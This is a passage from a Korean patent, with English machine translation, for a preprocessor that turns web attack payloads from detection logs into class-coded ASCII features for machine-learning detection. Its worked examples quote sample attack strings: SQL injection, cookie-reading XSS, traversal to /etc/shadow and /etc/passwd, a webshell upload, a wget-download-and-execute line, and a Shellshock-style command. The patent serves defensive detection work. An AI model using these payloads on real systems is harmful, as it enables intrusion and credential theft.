sequentially substituted according to the order of execution of the command, but will not be limited thereto.

한편, 상기 S440 단계에서, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부는, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되는지 여부에 따라 결정될 수 있을 것이다.On the other hand, in step S440, whether the plurality of specific character groups corresponds to each component constituting the specific command combination of the specific web attack type, the plurality of specific character groups of the specific web attack type It may be determined according to whether it is included in at least two or more classes among a specific plurality of classes corresponding to the specific instruction combination.

여기서, 전처리기(200)는, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 상기 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되면 해당 프로세스를 속행할 수 있을 것이다. Here, the preprocessor 200 may continue the process when the plurality of specific character groups are included in at least two or more of the specific plurality of classes corresponding to the specific command combination of the specific web attack type. will be.

또한, 전처리기(200)는, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 상기 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되지 않으면 해당 프로세스를 종료할 수 있을 것이다.In addition, the preprocessor 200 may terminate the process if the plurality of specific character groups are not included in at least two or more of the specific plurality of classes corresponding to the specific command combination of the specific web attack type. There will be.

예를 들어, 복수의 특정 문자 그룹이 "select" 및 "where"라고 가정하면, "select" 및 "where" 각각은 도 3에 나타나 있는 특정 웹 공격 유형인 SQL Injection(332)의 명령어 조합에 대응되는 복수의 클래스인 A Class, B Class, C Class 및 D Class 중 A Class 및 B Class에 포함되어 있으므로 전처리기(200)는 해당 프로세스를 속행할 것이다.For example, assuming that a plurality of specific character groups are "select" and "where", each of "select" and "where" corresponds to a command combination of SQL Injection 332, which is a specific web attack type shown in FIG. Pre-processor 200 will continue the process because it is included in A Class, B Class, C Class and D Class of A Class and B Class.

다른 예를 들어, 복수의 특정 문자 그룹이 "http" 및 "board"라고 가정하면, "http" 및 "board" 각각은 도 3에 나타나 있는 특정 웹 공격 유형인 File Download(333)의 명령어 조합에 대응되는 복수의 클래스인 A Class, B Class, C Class 및 D Class 중 A Class에만 포함되어 있으므로 전처리기(200)는 해당 프로세스를 종료할 것이다.For another example, assuming that a plurality of specific character groups are “http” and “board”, each of “http” and “board” is associated with a command combination of File Download (333), which is a specific type of web attack shown in FIG. 3. Since it is included only in A Class among A Class, B Class, C Class, and D Class corresponding to a plurality of classes, the preprocessor 200 will terminate the corresponding process.

한편, 복수의 웹 공격 유형은 제1 내지 제n 웹 공격 유형을 포함할 수 있을 것이다. 여기서, 상기 제1 내지 제n 웹 공격 유형 중 하나인 제k 웹 공격 유형은, 이에 속한 명령어의 조합을 구성하는 각각의 구성요소에 따라 나뉘어진, 상기 복수의 클래스 중 적어도 일부인 제1 클래스 내지 제n_k 클래스로 분류될 수 있는 명령어들에 대응되어 있을 수 있을 것이다. 이때, 상기 k 는 1 이상 n 이하의 정수일 수 있을 것이다.Meanwhile, the plurality of web attack types may include first to nth web attack types. Here, the k-th web attack type, which is one of the first to n-th web attack types, is divided according to each component constituting a combination of commands belonging to the first class to the first class, which is at least a part of the plurality of classes. It may correspond to instructions that can be classified as an n _k class. In this case, k may be an integer of 1 or more and n or less.

이때, 특정 웹 공격 유형이 상기 제k 웹 공격 유형에 해당되면, 전처리기(200)는, 상기 S440 단계에서, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단하고, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 상기 제1 클래스 내지 상기 제n_k 클래스를 나타내는 각각의 특정 제1-1 문자 내지 제1-n_k 문자로 치환할 수 있을 것이다. 여기서, 상기 제1-1 문자 내지 제1-n_k 문자는 상기 특정 제1 문자에 포함될 수 있을 것이다. 이에 대한 예시는 상술한 예시들을 통하여 설명한 것과 유사하므로 생략하도록 하겠다.At this time, when a specific web attack type corresponds to the k-th web attack type, the preprocessor 200, in step S440, each of the plurality of specific character groups constitutes the specific command combination of the specific web attack type. It is determined whether it corresponds to a component of the, and if the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, each of the plurality of specific character groups corresponds to the respective It may be replaced with each specific first-first character to first-n- _k characters representing the first class to the n- _k class. Here, the first-first characters to the first-n- _k characters may be included in the specific first character. Examples of this are similar to those described through the above-described examples, and thus will be omitted.

한편, 도 3에서 나타나 있는 것과 같이 복수의 명령어 각각이 복수의 웹 공격 유형별로 명령어의 조합을 구성하는 각각의 구성요소에 따라 나뉘어진 복수의 클래스 중 적어도 하나에 속한 채로 데이터베이스(900)에 저장되어 있다는 가정하에, 특정 웹 공격 유형에 해당하는 페이로드 데이터가 상기 S410 내지 상기 S450으로 이루어지는 단계를 거쳐 재구성된 결과를 간략하게 설명하면 다음과 같다. 여기서 제2 문자는 아스키 코드인 것으로 가정한다.Meanwhile, as shown in FIG. 3, each of the plurality of commands is stored in the database 900 while belonging to at least one of the plurality of classes divided according to each component constituting a combination of commands for each type of web attack. Under the assumption that the payload data corresponding to a specific web attack type is reconstructed through steps consisting of the S410 to the S450 are briefly described as follows. Here, it is assumed that the second character is an ASCII code.

일례로, SQL Injection 공격에 해당하는 페이로드 데이터인 SELECT * FROM members; DROP members-- 은 상기 S410 내지 상기 S440 단계를 거쳐 A*B;C-- 으로 표현될 수 있을 것이다. 따라서, 상기 A*B;C-- 은 ASCII Table을 통해 65 42 66 59 67 45 45로 치환될 수 있을 것이다. 한편, 알파벳 및 특수문자를 아스키 코드로 치환하는 상기 S450 단계는 ASCII Table을 참조하여 쉽게 수행할 수 있는 것이므로 하기 예시들에서는 생략하도록 하겠다.For example, SELECT * FROM members that are payload data corresponding to a SQL Injection attack; DROP members-- may be expressed as A * B; C-- through steps S410 to S440. Therefore, A * B; C-- may be replaced with 65 42 66 59 67 45 45 through an ASCII table. Meanwhile, the S450 step of substituting the alphabet and special characters with ASCII codes can be easily performed with reference to the ASCII Table, and thus will be omitted in the following examples.

일례로, XSS 공격에 해당하는 페이로드 데이터인 <script>alert('XSS');</script> 은 상기 S410 내지 상기 S440 단계를 거쳐 <A>B('');</A> 로 표현될 수 있을 것이다. As an example, <script> alert ('XSS'); </ script>, which is payload data corresponding to an XSS attack, is expressed as <A> B (''); </A> through steps S410 to S440. It could be.

일례로, XSS 공격에 해당하는 페이로드 데이터인 <script>alert(document.cookie)</script> 은 상기 S410 내지 상기 S440 단계를 거쳐 <A>B(C.D)</A> 로 표현될 수 있을 것이다. For example, <script> alert (document.cookie) </ script>, which is payload data corresponding to an XSS attack, may be expressed as <A> B (CD) </A> through steps S410 to S440. will be.

일례로, File Download 공격에 해당하는 페이로드 데이터인 http://x.x.x.x/bbs/file_download.php?path=../../../../../../../../etc/shadow 은 상기 S410 내지 상기 S440 단계를 거쳐 A://...//B_B.C?=../../../../../../../../C/D 로 표현될 수 있을 것이다. As an example, http: //xxxx/bbs/file_download.php? Path = .. / .. / .. / .. / .. / .. / .. / .. / etc / shadow goes through steps S410 to S440, A: //...//B_B.C? = .. / .. / .. / .. / .. / .. / .. / .. It can be expressed as / C / D.

일례로, File Download 공격에 해당하는 페이로드 데이터인 http://x.x.x.x/board/dbconn.inc 은 상기 S410 내지 상기 S440 단계를 거쳐 A://.../A/B.C 로 표현될 수 있을 것이다. For example, http: //xxxx/board/dbconn.inc, which is payload data corresponding to a File Download attack, may be expressed as A: //.../A/BC through steps S410 to S440. .

일례로, File upload 공격에 해당하는 페이로드 데이터인 http://x.x.x.x/board/pds/cmd.asp 은 상기 S410 내지 상기 S440 단계를 거쳐 ://.../A//B.C 로 표현될 수 있을 것이다.For example, http: //xxxx/board/pds/cmd.asp, which is payload data corresponding to a file upload attack, may be expressed as: //.../A//BC through steps S410 to S440. There will be.

일례로, File upload 공격에 해당하는 페이로드 데이터인 ?page=file/../../../hackable/uploads/webshell.php.jpg&cmd=cat/etc/passwd 은 상기 S410 내지 상기 S440 단계를 거쳐 ?=/../../..//A/A.B.C&B=C/A/D 로 표현될 수 있을 것이다.For example,? Page = file /../../../ hackable / uploads / webshell.php.jpg & cmd = cat / etc / passwd, which is the payload data corresponding to the file upload attack, refers to steps S410 to S440. After that, it can be expressed as? = / .. / .. / .. // A / ABC & B = C / A / D.

일례로, 비인가 접근 공격에 해당하는 페이로드 데이터인 http://x.x.x.x/admin.jsp?id=admin&pw=aaaa 은 상기 S410 내지 상기 S440 단계를 거쳐 ://.../C.B?A=C&B= 으로 표현될 수 있을 것이다.For example, http: //xxxx/admin.jsp? Id = admin & pw = aaaa, which is the payload data corresponding to the unauthorized access attack, goes through steps S410 to S440 where: //.../CB? A = C & B = Can be expressed as

일례로, 비인가 접근 공격에 해당하는 페이로드 데이터인 http://x.x.x.x/manager.php?id=admin&pw=aaaa 은 상기 S410 내지 상기 S440 단계를 거쳐 ://.../A.B?A=C&B= 으로 표현될 수 있을 것이다.For example, http: //xxxx/manager.php? Id = admin & pw = aaaa, which is the payload data corresponding to the unauthorized access attack, goes through steps S410 to S440 where: //.../AB? A = C & B = Can be expressed as

일례로, 원격 코드 실행 공격에 해당하는 페이로드 데이터인 cd/tmp;wget http://local.host/2;chmod 777 2;./2' 은 상기 S410 내지 상기 S440 단계를 거쳐 A/B;C://./;D;./' 로 표현될 수 있을 것이다.For example, cd / tmp; wget http://local.host/2;chmod 777 2; ./ 2 ', which is payload data corresponding to a remote code execution attack, is performed through steps S410 to S440 to A / B; C: //./; D; ./ '.

일례로, 원격 코드 실행 공격에 해당하는 페이로드 데이터인 “GET /us/cgi-bin/webscr HTTP/1.1" 302 26 "-" 0 { :;}; /bin/bash -c \"reboot\"" 은 상기 S410 내지 상기 S440 단계를 거쳐 A//B/C/.""-"{:;};/B/B-\"D\"" 로 표현될 수 있을 것이다.For example, “GET / us / cgi-bin / webscr HTTP / 1.1” 302 26 "-" 0 {:;}; / bin / bash -c \ "reboot \", the payload data corresponding to a remote code execution attack "May be expressed as A // B / C /.""-"{:;};/ B / B-\" D \ "" through steps S410 to S440.

이상 설명된 본 발명에 따른 실시예들은 다양한 컴퓨터 구성요소를 통하여 수행될 수 있는 프로그램 명령어의 형태로 구현되어 컴퓨터 판독 가능한 기록 매체에 기록될 수 있다. 상기 컴퓨터 판독 가능한 기록 매체는 프로그램 명령어, 데이터 파일, 데이터 구조 등을 단독으로 또는 조합하여 포함할 수 있다. 상기 컴퓨터 판독 가능한 기록 매체에 기록되는 프로그램 명령어는 본 발명을 위하여 특별히 설계되고 구성된 것들이거나 컴퓨터 소프트웨어 분야의 당업자에게 공지되어 사용 가능한 것일 수도 있다. 컴퓨터 판독 가능한 기록 매체의 예에는, 하드디스크, 플로피 디스크 및 자기 테이프와 같은 자기 매체, CD-ROM, DVD와 같은 광기록 매체, 플롭티컬 디스크(floptical disk)와 같은 자기-광 매체(magnetooptical media), 및 ROM, RAM, 플래시 메모리 등과 같은 프로그램 명령어를 저장하고 수행하도록 특별히 구성된 하드웨어 장치가 포함된다. 프로그램 명령어의 예에는, 컴파일러에 의해 만들어지는 것과 같은 기계어 코드뿐만 아니라 인터프리터 등을 사용해서 컴퓨터에 의해서 실행될 수 있는 고급 언어 코드도 포함된다. 상기 하드웨어 장치는 본 발명에 따른 처리를 수행하기 위해 하나 이상의 소프트웨어 모듈로서 작동하도록 구성될 수 있으며, 그 역도 마찬가지이다.The embodiments according to the present invention described above may be implemented in the form of program instructions that can be executed through various computer components and can be recorded in a computer-readable recording medium. The computer-readable recording medium may include program instructions, data files, data structures, or the like alone or in combination. The program instructions recorded on the computer-readable recording medium may be specially designed and configured for the present invention or may be known and available to those skilled in the computer software field. Examples of computer-readable recording media include magnetic media such as hard disks, floppy disks, and magnetic tapes, optical recording media such as CD-ROMs, DVDs, and magnetooptical media such as floptical disks. And hardware devices specifically configured to store and execute program instructions such as ROM, RAM, flash memory, and the like. Examples of program instructions include not only machine language codes produced by a compiler, but also high-level language codes that can be executed by a computer using an interpreter or the like. The hardware device may be configured to operate as one or more software modules to perform processing according to the present invention, and vice versa.

이상에서 본 발명이 구체적인 구성요소 등과 같은 특정 사항들과 한정된 실시예 및 도면에 의해 설명되었으나, 이는 본 발명의 보다 전반적인 이해를 돕기 위해서 제공된 것일 뿐, 본 발명이 상기 실시예들에 한정되는 것은 아니며, 본 발명이 속하는 기술분야에서 통상적인 지식을 가진 자라면 이러한 기재로부터 다양한 수정 및 변형을 꾀할 수 있다.In the above, the present invention has been described by specific matters such as specific components, etc. and limited embodiments and drawings, which are provided to help the overall understanding of the present invention, but the present invention is not limited to the above embodiments , Those skilled in the art to which the present invention pertains can make various modifications and variations from these descriptions.

따라서, 본 발명의 사상은 상기 설명된 실시예에 국한되어 정해져서는 아니 되며, 후술하는 특허청구범위뿐만 아니라 이 특허청구범위와 균등하게 또는 등가적으로 변형된 모든 것들은 본 발명의 사상의 범주에 속한다고 할 것이다.Therefore, the spirit of the present invention is not limited to the above-described embodiment, and should not be determined, and all claims that are equally or equivalently modified as well as the claims below will fall within the scope of the spirit of the present invention. Would say

Claims

In the method of generating a reconstructed payload data by extracting a web attack pattern based on the instructions of the machine learning target system,
A plurality of classes, each of the plurality of instructions included in the machine learning target system is divided according to each component constituting a combination of instructions for each type of web attack-each of the plurality of classes is different from the first class Defined as character-while being stored in the database while belonging to at least one of the following:
(a) Payload data-The payload data is included in security threat data detected by a security threat detection system, and the security threat data is assigned to a specific web attack type corresponding to at least one of the plurality of web attack types. If-is obtained, the preprocessor performs a process of talking at least a part of the characters, the special characters, and numbers included in the payload data based on the special characters;
(b) the preprocessor configures each of the plurality of commands corresponding to the specific web attack type stored in the database among the tokenized characters, the specialized characters, and the tokenized numbers. Performing a process of selecting a plurality of specific character groups;
(c) the preprocessor determines whether (i) the plurality of specific character groups correspond to each component constituting a specific command combination of the specific web attack type, and the plurality of specific character groups are specified If each component constituting the specific command combination of the web attack type is replaced, each of the plurality of specific character groups is replaced with each specific first character representing each class corresponding thereto, and (ii) the talk Performing a process of removing, from the payload data, the rest of the plurality of specific character groups and the special characters among the aged characters, the tokenized special characters, and the tokenized numbers; And
(d) the pre-processor performing a process of replacing each of the specific first characters and the special characters with a real number or a second character corresponding to the real number to generate reconstructed payload data;
Including,
In step (c),
The preprocessor determines whether the plurality of specific character groups corresponding to each component constituting a specific command combination of the specific web attack type according to the order of execution of the command corresponding to the payload data is determined. And each specific first character representing the class of.

According to claim 1,
After step (d),
(e) the preprocessor further comprising the step of supporting the generated reconstruction payload data to be input to a machine learning apparatus.

According to claim 1,
In step (c),
It is determined whether the preprocessor corresponds to (i) at least one of each component constituting the specific command combination of the specific web attack type for some specific character group among the plurality of specific character groups, and the part When a specific character group corresponds to at least one of each component constituting the specific command combination of the specific web attack type, after replacing some of the specific character groups with specific 1-1 characters representing the corresponding class , (ii) determining whether or not it corresponds to the rest of each component constituting the specific command combination of the specific web attack type with respect to the other specific character group among the plurality of specific character groups, and the remaining some specific characters Among each component that the group constitutes the specific command combination of the specific web attack type, When the Jie, and replaced with the remainder of some specific group of characters in the first-second letter indicating the class corresponding to this,
And wherein the first-first character and the first-second character are included in the specific first character.

According to claim 1,
In step (c),
After the preprocessor determines whether the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, the plurality of specific character groups are the type of the specific web attack type. When corresponding to each component constituting a specific instruction combination, each of the plurality of specific character groups is replaced with respective 1-1 and 1-2 characters representing respective classes corresponding thereto,
And wherein the first-first character and the first-second character are included in the specific first character.

According to claim 1,
In step (c),
Whether the plurality of specific character groups corresponds to each component constituting the specific command combination of the specific web attack type, the plurality of specific character groups corresponds to the specific command combination of the specific web attack type. The method is characterized in that it is determined according to whether or not included in at least two or more of a specific plurality of classes.

The method of claim 5,
The preprocessor continues (i) if the plurality of specific character groups are included in at least two or more of the specific plurality of classes corresponding to the specific instruction combination of the specific web attack type, and (ii) And when the plurality of specific character groups are not included in at least two or more of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, the method is terminated.

According to claim 1,
The plurality of web attack types include first to nth web attack types,
The k-th web attack type corresponds to instructions that can be classified into first to n- _th classes, which are at least a part of the plurality of classes, divided according to each component constituting a combination of instructions belonging thereto,
Wherein k is an integer of 1 or more and n or less.

The method of claim 7,
If the specific web attack type corresponds to the k-th web attack type,
The preprocessor,
In step (c),
It is determined whether the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, and the plurality of specific character groups are configured to select the specific command combination of the specific web attack type. When corresponding to each constituent element, each of the plurality of specific character groups is replaced with respective specific first-first to first-n- _k characters representing the first to n- _th classes. And
Characterized in that the 1-1 th character to the 1-n _k character are included in the specific first character.

According to claim 1,
The security threat detection system collects a plurality of detection log data included in the detected security threat data, and determines that it is the specific web attack type among the plurality of web attack types through the collected plurality of detection log data Method characterized in that.

According to claim 1,
The method of claim 1, wherein the first character is a character that can be replaced by a real number or a real number.

According to claim 1,
The method of claim 2, wherein the second character is a character that can be used for machine learning.

According to claim 1,
The first character is an alphabet, and the second character is an ASCII code.

In the pre-processor to extract the web attack pattern based on the instructions of the machine learning target system to generate the reconstructed payload data,
A plurality of classes, each of the plurality of instructions included in the machine learning target system is divided according to each component constituting a combination of instructions for each type of web attack-each of the plurality of classes is different from each other according to the first class Defined as characters-a database stored as belonging to at least one of the following;
At least one memory for storing instructions; And
Including at least one processor configured to execute the instructions,
The processor comprises: (1) payload data-the payload data is included in security threat data detected by a security threat detection system, and the security threat data is specified corresponding to at least one of the plurality of web attack types. Corresponds to the web attack type-When is obtained, the process of talking to at least some of the characters, the special characters and numbers included in the payload data based on the special characters, (2) the tokenized characters, A process of selecting a plurality of specific character groups each constituting a plurality of commands corresponding to the specific web attack type stored in the database among the tokenized special characters and the tokenized numbers, (3) the A plurality of specific character groups are provided for each component constituting a specific command combination of the specific web attack type. If it is determined whether the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, each of the plurality of specific character groups represents a respective class corresponding thereto The payload data is replaced with each specific first character, and the rest of the plurality of specific character groups and the special characters among the tokenized characters, the tokenized special characters, and the tokenized numbers are excluded. And (4) performing the process of generating the reconstructed payload data by replacing each of the specific first characters and the special characters with a real number or a second character corresponding to the real number,
The processor,
In the above (3) process,
It is determined whether the plurality of specific character groups according to the instruction execution order corresponding to the payload data corresponds to each component constituting a specific instruction combination of the specific web attack type, and indicates each class corresponding thereto Preprocessor characterized by substituting for each specific first character.

The method of claim 13,
The processor,
After the process (4),
(5) Pre-processor characterized in that it further performs a process to support the generated reconstruction payload data to be input to the machine learning apparatus.

The method of claim 13,
The processor,
In the above (3) process,
(i) it is determined whether or not it corresponds to at least one of each component constituting the specific command combination of the specific web attack type for some specific character group among the plurality of specific character groups, and the certain specific character groups When at least one of each component constituting the specific command combination of the specific web attack type is replaced, after replacing some of the specific character groups with specific 1-1 characters representing the corresponding class, (ii) It is determined whether or not the other of the plurality of specific character groups correspond to the rest of each component constituting the specific command combination of the specific web attack type, and the remaining some specific character groups are specified. If it corresponds to the rest of each component constituting the specific command combination of the web attack type, And replacing the rest of the group of some specific group of characters in the first-second letter indicating the class corresponding to this,
The preprocessor according to claim 1, wherein the 1-1 character and the 1-2 character are included in the specific first character.

The method of claim 13,
The processor,
In the above (3) process,
After determining whether the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, the plurality of specific character groups may select the specific command combination of the specific web attack type. When corresponding to each constituent element, each of the plurality of specific character groups is replaced with respective 1-1 and 1-2 characters representing respective classes corresponding thereto,
The preprocessor according to claim 1, wherein the 1-1 character and the 1-2 character are included in the specific first character.

The method of claim 13,
In the above (3) process,
Whether the plurality of specific character groups corresponds to each component constituting the specific command combination of the specific web attack type, the plurality of specific character groups corresponds to the specific command combination of the specific web attack type. Pre-processor characterized in that it is determined according to whether or not included in at least two or more of the specific plurality of classes.

The method of claim 17,
The processor,
(i) if the plurality of specific character groups are included in at least two or more of the specific plurality of classes corresponding to the specific combination of commands of the specific web attack type, continue the process, and (ii) the plurality of specific characters And a character group is not included in at least two or more of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, and the preprocessor is terminated.

The method of claim 13,
The plurality of web attack types include first to nth web attack types,
The k-th web attack type corresponds to instructions that can be classified into first to n- _th classes, which are at least a part of the plurality of classes, divided according to each component constituting a combination of instructions belonging thereto,
The k is a pre-processor, characterized in that an integer of 1 or more and n or less.

The method of claim 19,
If the specific web attack type corresponds to the k-th web attack type,
The processor,
In the above (3) process,
It is determined whether the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, and the plurality of specific character groups are configured to select the specific command combination of the specific web attack type. When corresponding to each constituent element, each of the plurality of specific character groups is replaced with respective specific first-first to first-n- _k characters representing the first to n- _th classes. And
The pre-processor, characterized in that the 1-1 th character to 1 th -n _k character are included in the specific first character.

The method of claim 13,
The security threat detection system collects a plurality of detection log data included in the detected security threat data, and determines that it is the specific web attack type among the plurality of web attack types through the collected plurality of detection log data Preprocessor characterized in that.

The method of claim 13,
The first character is a preprocessor, characterized in that a character that can be replaced by a real number or real number.

The method of claim 13,
The second character is a preprocessor, characterized in that can be used in machine learning.

The method of claim 13,
The first character is an alphabet, and the second character is an ASCII code.